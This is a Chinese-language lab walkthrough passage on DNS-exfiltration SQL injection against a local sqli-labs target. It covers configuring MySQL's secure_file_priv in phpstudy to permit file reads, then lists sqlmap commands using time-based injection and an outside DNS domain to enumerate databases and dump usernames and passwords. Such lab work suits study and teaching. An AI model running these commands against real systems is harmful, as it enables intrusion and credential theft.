目录
1.win11中下载小皮搭建sqli-labs靶场并查看win11数据库中的文件读取配置
2.2.2在win11靶机ping一下server2008中创建的域名并打开kali查看
2.2.4测试转发器的域名是否可以ping通并查看kali中接收情况
- show variables like '%secure%';
- #当secure_file_priv为空,就可以读取磁盘的目录。
- #当secure_file_priv为G:\,就可以读取G盘的文件。
- #当secure_file_priv为null,load_file就不能加载文件。
-
- phpstudy中在D:\phpstudy_pro\Extensions\MySQL5.7.26下找到my.ini打开添加一条secure_file_priv=""








- #注入查库
- sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domaim "hehe.top" --dbs

- #获取表
- sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" --tables

- #查列
- sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" --columns

- #取列值
- sqlmap -u "http://192.168.78.175/sqli-labs-master/Less-8?id=1" --technique=T --dns-domain "hehe.top" -D "security" -t "users" -C "username,password" --dump
